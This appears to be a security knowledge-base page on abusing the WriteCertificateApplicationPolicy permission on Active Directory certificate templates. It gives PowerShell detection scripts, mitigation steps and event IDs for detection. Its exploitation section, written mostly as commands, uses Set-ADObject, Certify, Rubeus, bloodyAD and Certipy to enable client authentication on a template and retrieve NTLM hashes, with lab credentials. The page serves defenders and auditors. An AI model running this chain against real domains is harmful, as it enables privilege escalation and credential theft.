WriteCertificateApplicationPolicy
Summary
FSProtect ACL Alias
WriteCertificateApplicationPolicy
AD Alias
Write msPKI-Certificate-Application-Policy
Affected Object Types
Certificate Templates
Exploitation Certainty
Certain
AD Attribute
msPKI-Certificate-Application-Policy
AD Attribute Guid
dbd90548-aa37-4202-9966-8c537ba5ce32
AD Right
WriteProperty
Description
The WriteCertificateApplicationPolicy permission in an Active Directory or Windows PKI environment grants an account the authority to create or modify the Certificate Application Policies linked to a certificate template or CA object. Certificate Application Policies define the intended uses and restrictions of issued certificates (e.g., client authentication, code signing, secure email), ensuring that only approved use cases are permitted within the organization. By delegating this permission, administrators can tailor certificates to meet specific security and operational requirements.
However, if misconfigured, the WriteCertificateApplicationPolicy permission can become a significant security risk. An attacker or unauthorized user with this permission could expand the allowed usage of certificates, enabling malicious scenarios such as unauthorized code signing, certificate-based impersonation of privileged accounts, or illicit decryption of sensitive communications. Exploiting this vulnerability may result in unauthorized access, privilege escalation, and persistent control over critical systems, ultimately jeopardizing the integrity and confidentiality of the entire network.
Identification
PowerShell
Active Directory Module
Using the ActiveDirectory PowerShell module, you can enumerate WriteCertificateApplicationPolicy entries.
1. Find-WriteCertificateApplicationPolicy function
function Find-WriteCertificateApplicationPolicy {
[CmdletBinding()]
param([string]$Target = $null,[string]$OutputPath = "WriteCertificateApplicationPolicy.csv")
$guid = [Guid]'dbd90548-aa37-4202-9966-8c537ba5ce32'
$Allow = [System.Security.AccessControl.AccessControlType]::Allow
$WriteProp = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty
try {
$root = [ADSI]"LDAP://RootDSE"
$configNC = $root.configurationNamingContext
$base = "LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
$de = New-Object System.DirectoryServices.DirectoryEntry($base)
$ds = New-Object System.DirectoryServices.DirectorySearcher($de)
if ([string]::IsNullOrWhiteSpace($Target)) { $ds.Filter = '(objectClass=pKICertificateTemplate)'
} else { $ds.Filter = "(&(objectClass=pKICertificateTemplate)(|(cn=$Target)(displayName=$Target)))" }
$ds.PropertiesToLoad.Add("distinguishedName") | Out-Null
$rows = foreach ($r in $ds.FindAll()) {
$dn = $r.Properties['distinguishedname'][0]
$entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dn")
$acl = $entry.ObjectSecurity
foreach ($ace in $acl.GetAccessRules($true, $false, [System.Security.Principal.NTAccount])) {
if ($ace.AccessControlType -ne $Allow) { continue };if ( ($ace.ActiveDirectoryRights -band $WriteProp) -eq 0 ) { continue }
if ($ace.ObjectType -ne $guid) { continue }; if ($ace.IsInherited) { continue }
[pscustomobject]@{
'Vulnerable Template' = $dn
'Internal Threat' = $ace.IdentityReference.Value }} }
if ($rows) { $rows | Export-Csv -Path $OutputPath -NoTypeInformation }}catch { Write-Error "Failed: $_" }
}2. Scan all domain templates
Find-WriteCertificateApplicationPolicy3. Scan a specific template
Find-WriteCertificateApplicationPolicy -Target TMUser.NET Directory Services
By leveraging PowerShell’s built-in .NET DirectoryServices namespace, you can enumerate WriteCertificateApplicationPolicy entries without relying on any external modules or dependencies.
1. Find-WriteCertificateApplicationPolicySimple function
function Find-WriteCertificateApplicationPolicySimple {
[CmdletBinding()]
param([string]$Target = $null,[string]$OutputPath = "WriteCertificateApplicationPolicy.csv")
$Allow = [System.Security.AccessControl.AccessControlType]::Allow
$WriteProp= [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty
$GuidCap = [Guid]'dbd90548-aa37-4202-9966-8c537ba5ce32' # ms-PKI-Certificate-Application-Policy
try {
if ($Target) { try {$entries = @( New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Target") )} catch {Write-Error "Failed to bind to target '$Target': $_";return;}}
else {
$root = [ADSI]"LDAP://RootDSE";$config = $root.configurationNamingContext
$base = "LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$config";$searchRoot = New-Object System.DirectoryServices.DirectoryEntry($base)
$ds = New-Object System.DirectoryServices.DirectorySearcher($searchRoot);$ds.Filter = "(objectClass=pKICertificateTemplate)"
$ds.PageSize = 1000;[void]$ds.PropertiesToLoad.Add("distinguishedName")
$hits = $ds.FindAll()
$entries = foreach ($h in $hits) {
try { $h.GetDirectoryEntry() } catch { Write-Warning "Could not bind '${($h.Properties['distinguishedname'][0])}': $_"; continue }} }
$rows = foreach ($entry in $entries) {
$dn = try { $entry.Properties["distinguishedName"][0] } catch { $null }
if (-not $dn) { continue }
try {$acl = $entry.ObjectSecurity;$aces = $acl.GetAccessRules($true, $false, [System.Security.Principal.NTAccount]);} catch {Write-Warning "Failed to read ACL for $dn : $_";continue;}
foreach ($ace in $aces) {
if ($ace.AccessControlType -ne $Allow) { continue };if ( ($ace.ActiveDirectoryRights -band $WriteProp) -eq 0 ) { continue }
if ($ace.ObjectType -ne $GuidCap) { continue };if ($ace.IsInherited) { continue }
[PSCustomObject]@{
'Vulnerable Template' = $dn
'Internal Threat' = $ace.IdentityReference.Value}}}
if ($rows) {$rows | Export-Csv -Path $OutputPath -NoTypeInformation -Encoding UTF8} else {Write-Host "No matching ACEs found."}}catch {Write-Error "Failed: $_" }}2. Scan all domain templates
Find-WriteCertificateApplicationPolicySimple3. Scan a specific template
Find-WriteCertificateApplicationPolicySimple -Target "CN=TMUser,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=Forestall,DC=labs"Active Directory Services Interface
1. Open Active Directory Services Interface (ADSI edit) .
2. Right-click to ADSI Edit and select Connect to... from the context menu.
3. Select Configuration on Select a well known Naming Context and click OK.
4. Navigate to Configuration > Services > Public Key Services > Certificate Templates.
5. In the Certificate Templates list, double-click Certificate Template.
6. In the Properties window, navigate to the Security tab.
7. Click the Advanced button to open the Advanced Security Settings dialog.
8. In the Advanced Security Settings window, locate and select the relevant Access Control Entry (ACE) for the user or group you wish to configure.
9. Click Edit to modify the selected ACE.
10. In the permissions list, locate and check the option Write msPKI-Certificate-Application-Policy.
11. Click OK to save your changes and close the dialogs.
Exploitation
This permission can be exploitable on Windows systems with Certify and Rubeus, while on Linux systems, tools such as Certipy can be effectively used for exploitation.Certify, Rubeus, Certipy
Windows
When attempting to use a certificate template that does not include Client Authentication in its application policy, it is not possible to authenticate with the issued certificate.
The following examples demonstrate exploitation on Windows and Linux environments.
Add Client Authentication to the Application Policy
# Import Active Directory module
Import-Module ActiveDirectory
# Distinguished Name (DN) of the Certificate Template you want to modify
$templateDN = "<Certificate Template>"
# OID values for msPKI-Certificate-Application-Policy (example)
$applicationPolicies = @(
"1.3.6.1.5.5.7.3.1", # Server Authentication
"1.3.6.1.5.5.7.3.2" # Client Authentication
)
# Set (write) the msPKI-Certificate-Application-Policy attribute
Set-ADObject -Identity $templateDN -Replace @{'msPKI-Certificate-Application-Policy' = $applicationPolicies}Example:
Import-Module ActiveDirectory
$templateDN = 'CN=TMUser,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=Forestall,DC=labs'
$applicationPolicies = @(
"1.3.6.1.5.5.7.3.1", # Server Authentication
"1.3.6.1.5.5.7.3.2" # Client Authentication
)
Set-ADObject -Identity $templateDN -Replace @{'msPKI-Certificate-Application-Policy' = $applicationPolicies}
Request a certificate
.\Certify.exe request /ca:"caHost\caName" /template:"<templateName>"Convert certificate to a pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxRetrieve NTLM hash of the user
.\Rubeus.exe asktgt /certificate:cert.pfx /user:"<user>" /domain:"<domain>" /enctype:aes128 /getcredentialsExample:
.\Certify.exe request /ca:"DC.Forestall.labs\Forestall-ROOT-CA" /template:TmUser
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
.\Rubeus.exe asktgt /certificate:cert.pfx /user:adam /domain:forestall.labs /enctype:aes128 /getcredentials
Linux
When attempting to use a certificate template that does not include Client Authentication in its application policy, it is not possible to authenticate with the issued certificate.
Add Client Authentication to the Application Policy
bloodyAD --host <dchost> -d <domain> -u <user> -p '<pass>' set object '<templateDn>' msPKI-Certificate-Application-Policy -v 1.3.6.1.5.5.7.3.2 -v 1.3.6.1.5.5.7.3.1Request a certificate
certipy-ad req -u <user>@<domain> -p '<pass>' -ca 'caName' -template <templateName> -target <dcip>Retrieve NTLM hash for the user
certipy-ad auth -pfx <pfxFile> -username <user> -domain <domain> -dc-ip <dcip>Example:
bloodyAD --host dc.forestall.labs -d forestall.labs -u adam -p 'Temp123!' set object 'CN=TMUser,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=Forestall,DC=labs' msPKI-Certificate-Application-Policy -v 1.3.6.1.5.5.7.3.2 -v 1.3.6.1.5.5.7.3.1
certipy-ad req -u [email protected] -p 'Temp123!' -ca 'Forestall-Root-CA' -template TMUser -target 192.168.100.128
certipy-ad auth -pfx adam.pfx -username adam -domain forestall.labs -dc-ip 192.168.100.128
Important Note
After you have obtained the certificate and set the client authentication application policy, you can authenticate to a client or server with this certificate.
Mitigation
1. Open Active Directory Services Interface (ADSI Edit) .
2. Right-click to ADSI Edit and select Connect to... from the context menu.
3. Select Configuration on Select a well known Naming Context and click OK.
4. Navigate to Configuration > Services > Public Key Services > Certificate Templates.
5. In the Certificate Templates list, double click Certificate Template.
6. In the Properties window, navigate to the Security tab.
7. Click the Advanced button to open the Advanced Security Settings dialog.
8. In the Advanced Security Settings window, locate and select the relevant Access Control Entry (ACE) for the user or group you wish to configure.
9. Click Edit to modify the selected ACE.
10. In the permissions list, locate and remove the option Write msPKI-Certificate-Application-Policy.
11. Click OK to save your changes and close the dialogs.
Detection
Adding new Access Control Entries on the Active Directory objects changes the ntSecurityDescriptor attribute of the objects themselves. These changes can be detected with the 5136 and 4662 Event IDs to identify dangerous modifications.
5136
A directory service object was modified.
ntSecurityDescriptor
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136
4662
An operation was performed on an object.
AccessList, AccessMask
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662
4886
Certificate Services received a certificate request.
CertificateTemplate, Requester
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn319076(v=ws.11)
4887
Certificate Services approved a certificate request and issued a certificate.
CertificateTemplate, Requester
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn319076(v=ws.11)
References
Last updated
Was this helpful?